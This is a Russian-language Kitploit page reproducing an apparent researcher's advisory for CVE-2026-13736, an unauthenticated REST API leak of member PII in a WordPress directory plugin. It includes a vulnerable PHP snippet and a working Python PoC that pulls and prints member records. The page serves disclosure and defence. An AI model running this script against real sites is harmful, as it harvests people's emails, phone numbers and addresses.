Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-13736 — PoC-эксплойт и техническое уведомление о раскрытии персональных данных (PII) участников без аутентификации в плагине каталога WordPress с REST API, включая анализ первопричины, PoC-код и рекомендации по устранению уязвимости. | Kitploit
Инструменты/GitHubGitHub/minhhk68/cve-2026-13736
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьНеправильная КонфигурацияБезопасность API
GitHubminhhk68/cve-2026-13736

CVE-2026-13736

PoC-эксплойт и техническое уведомление о раскрытии персональных данных (PII) участников без аутентификации в плагине каталога WordPress с REST API, включая анализ первопричины, PoC-код и рекомендации по устранению уязвимости.

Репозиторий
261 месяц назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 — Неаутентифицированное раскрытие PII участников через REST API

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory NVD Reference License: MIT


📖 Обзор бюллетеня

CVE-2026-13736 — это уязвимость неаутентифицированного раскрытия персональных данных (PII) участников, затрагивающая плагин WordPress NewPath WildApricotPress Add-on – Member Directory версии до 1.0.0 включительно. Уязвимость была обнаружена и проанализирована исследователем в области кибербезопасности Huynh Kien Minh (MinhHK). Недостаток связан с пользовательской архитектурой маршрутизации REST API плагина WordPress, в которой конечные точки каталога участников не обеспечивают соблюдение ограничений доступа к конфиденциальности для ограниченных полей. В результате неаутентифицированные удалённые посетители могут обращаться к публичным REST-маршрутам и собирать конфиденциальные данные участников, включая личные адреса электронной почты, личные номера телефонов и атрибуты каталога участников, которые были явно настроены как доступные только участникам. Такое раскрытие чувствительных данных нарушает ожидаемые границы конфиденциальности и позволяет проводить целенаправленный фишинг, подбор учётных данных (credential stuffing) и несанкционированное профилирование в затронутых организациях. Исследователь безопасности Huynh Kien Minh подтвердил эту уязвимость с оценкой CVSS 3.1 5.3 (Medium) (CWE-284 / CWE-200) и рекомендовал незамедлительное ужесточение разрешений для REST-конечных точек, проверку конфиденциальности на уровне полей и очистку сериализованных JSON-ответов API участников.

Быстрые ссылки: Ознакомьтесь с официальным портфолио по кибербезопасности исследователя или просмотрите официальный бюллетень WPScan.


📌 Краткое описание и технические метаданные

ПараметрТехнические характеристики
Идентификатор уязвимостиCVE-2026-13736
Целевое ПОNewPath WildApricotPress Add-on – Member Directory (WordPress Plugin)
Слаг плагинаnewpath-wildapricotpress-add-on-member-directory
Уязвимые версии<= 1.0.0
Класс уязвимостиНекорректный контроль доступа / Раскрытие информации (CWE-284 / CWE-200 / CWE-862)
Оценка CVSS v3.15.3 (Medium) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Первооткрыватель / ИсследовательHuynh Kien Minh (MinhHK)
Орган верификацииWPScan / MITRE Corporation / NVD
Ссылка на бюллетень WPScanОтчёт WPScan 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
Ссылка на NVDПодробности CVE-2026-13736 на NVD
Аналитика угроз FeedlyХаб Feedly CVE-2026-13736
Портфолио исследователяhttps://minhhk.web.app/

🔍 Анализ первопричины

Первопричина CVE-2026-13736 кроется в реализации контроллера REST API плагина. Плагин регистрирует публичный маршрут WordPress REST API (например, /wp-json/wildapricot/v1/members или /wp-json/newpath-wap/v1/directory) для обеспечения рендеринга каталогов участников и контактных карточек на стороне клиента.

Анализ уязвимого шаблона кода

// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
    register_rest_route( 'newpath-wap/v1', '/directory', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'newpath_wap_get_member_directory',
        'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
    ) );
} );

function newpath_wap_get_member_directory( $request ) {
    $members_data = get_wildapricot_cached_members();
    
    // FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
    // without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
    return rest_ensure_response( $members_data );
}

Механизм технической ошибки

  1. Открытый callback разрешений: Маршрут объявляет 'permission_callback' => '__return_true', что разрешает неаутентифицированные HTTP GET-запросы из любого источника.
  2. Отсутствие фильтрации конфиденциальности на уровне полей: В то время как фронтенд JavaScript или шаблон условно скрывает поля, настроенные как «Только для участников», бэкенд REST API сериализует весь набор данных участников в JSON.
  3. Раскрытие информации (PII): Злоумышленники, обходящие пользовательский интерфейс, могут напрямую использовать необработанную JSON-нагрузку для сбора полных баз данных с именами участников, личными номерами телефонов, рабочими электронными адресами, статусами членства и частными адресами.

💻 Эксплойт-код Proof-of-Concept (PoC)

Этическое предупреждение: Этот Proof-of-Concept предоставлен исключительно для проверки уязвимости, оборонительных исследований и ответственного раскрытия информации исследователем безопасности Huynh Kien Minh.

Автоматизированный скрипт аудита на Python (poc_cve_2026_13736.py)

#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import json
import sys

TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"

def verify_vulnerability(target_url):
    print(f"[*] Auditing Target: {target_url}")
    print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if isinstance(data, list) and len(data) > 0:
                sample_record = data[0]
                pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
                
                print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
                print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
                print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
                return True
            else:
                print("[-] Endpoint responded with empty data.")
        elif response.status_code in [401, 403]:
            print("[+] Endpoint requires authentication (Protected/Patched).")
        else:
            print(f"[-] Received HTTP status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
        
    return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    verify_vulnerability(target)

Команда проверки cURL

Скачать инструмент